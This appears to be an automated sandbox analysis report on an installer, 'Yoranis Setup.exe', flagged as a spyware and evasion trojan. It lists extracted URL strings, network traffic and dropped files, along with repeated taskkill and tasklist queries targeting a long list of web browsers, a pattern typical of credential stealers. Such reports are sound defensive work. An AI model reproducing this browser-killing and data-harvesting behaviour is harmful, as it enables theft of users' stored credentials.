Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zkochan/packages/tree/main/which-pm-runs#readme
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xdg/xdgmime
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hackerone.com/reports/541502
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hsivonen.fi/encoding-menu/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/comms.html#the-websocket-interface
Source: Yoranis Setup.exe, 00000000.00000003.330047764144.00000000079D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://llvm.org/svn/llvm-project/cfe/tags/RELEASE_370/final/lib/Basic/Version.cpp
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://myactivity.google.com/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory.png?downloads=true&stars=true)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/smart-buffer.png?downloads=true&downloadRank=true&stars=true
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npm.im/$
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npmjs.org/package/require-directory))
Source: uk.pak.0.drString found in binary or memory: https://passwords.google.com
Source: fr.pak.0.drString found in binary or memory: https://passwords.google.comCompte
Source: en-US.pak.0.drString found in binary or memory: https://passwords.google.comGoogle
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://policies.google.com/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ponyfill.com/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://robwu.nl/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secure.travis-ci.org/troygoode/node-require-directory.png)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://semver.org/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com)
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: uk.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security).
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc1928#section-3
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5234#appendix-B.1
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-9.1
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://travis-ci.org/JoshGlazebrook/smart-buffer)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://travis-ci.org/JoshGlazebrook/smart-buffer.svg?branch=master)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/intent/user?screen_name=troygoode)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/cliui
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/yargs-parser
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#grammardef-option-expression
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#integrity-metadata-description
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.cl.cam.ac.uk/%7Emgk25/ucs/utf8_check.c
Source: resources.pak.0.drString found in binary or memory: https://www.google.com/
Source: uk.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html&AideG
Source: pt-BR.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlA&judaGerenciado
Source: en-US.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/buffer-alloc)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/buffer-from)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/safe-buffer)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/safer-buffer)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/wrap-ansi
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.patreon.com/feross
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yargs.js.org/
Source: unknownNetwork traffic detected: HTTP traffic on port 62305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53030
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64794
Source: unknownNetwork traffic detected: HTTP traffic on port 51575 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51537
Source: unknownNetwork traffic detected: HTTP traffic on port 55939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52572 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50333 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62305
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57123
Source: unknownNetwork traffic detected: HTTP traffic on port 61452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59265
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61452
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65377
Source: conhost.exe | Process created: 61
Source: cmd.exe | Process created: 110

System Summary

Source: C:\Users\user\Desktop\Yoranis Setup.exe | File dump: YoransSetup.exe.0.dr 173936640
Source: C:\Users\user\Desktop\Yoranis Setup.exe | File dump: YoransSetup.exe0.0.dr 173936640
Source: C:\Users\user\Desktop\Yoranis Setup.exe | Process token adjusted: Security
Source: YoransSetup.exe0.0.dr | Static PE information: Number of sections : 15 > 10
Source: vulkan-1.dll0.0.dr | Static PE information: Number of sections : 11 > 10
Source: libEGL.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll0.0.dr | Static PE information: Number of sections : 11 > 10
Source: dxcompiler.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.0.dr | Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.0.dr | Static PE information: Number of sections : 11 > 10
Source: dxcompiler.dll0.0.dr | Static PE information: Number of sections : 11 > 10
Source: libEGL.dll0.0.dr | Static PE information: Number of sections : 11 > 10
Source: YoransSetup.exe.0.dr | Static PE information: Number of sections : 15 > 10
Source: Yoranis Setup.exe, 00000000.00000003.330026958969.0000000005E36000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs Yoranis Setup.exe
Source: Yoranis Setup.exe, 00000000.00000003.330047764144.0000000007A01000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Yoranis Setup.exe
Source: Yoranis Setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: // did the user specify their own .sln file?
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: * On Windows, find the first build/*.sln file.
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: glob('build/*.sln', function (err, files) {
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: return path.extname(arg) === '.sln'
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: print('Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0])
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: return callback(new Error('Could not find *.sln file. Did you run "configure"?'))
Source: classification engine | Classification label: mal72.troj.spyw.evad.winEXE@322/386@13/9
Source: C:\Users\user\Desktop\Yoranis Setup.exe | File created: C:\Users\user\AppData\Local\Programs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\Yoranis Setup.exe | Mutant created: \Sessions\1\BaseNamedObjects\b4a0680f-9ee1-57b1-adfd-e68812be32d6
Source: C:\Users\user\Desktop\Yoranis Setup.exe | File created: C:\Users\user\AppData\Local\Temp\nsc3472.tmp
Source: Yoranis Setup.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'YORANSSETUP.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\curl.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe")
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'MSEDGE.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'FIREFOX.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'CHROME.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "msedge.exe")
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "brave.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "firefox.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "opera.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "orbitum.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "centbrowser.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sputnik.exe")
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "vivaldi.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "epicprivacybrowser.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "uran.exe")
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "yandex.exe")
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "iridium.exe")
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "kometa.exe")
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'MSEDGE.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'FIREFOX.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'IEXPLORE.EXE'
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'CHROME.EXE'
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "7star.exe")
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
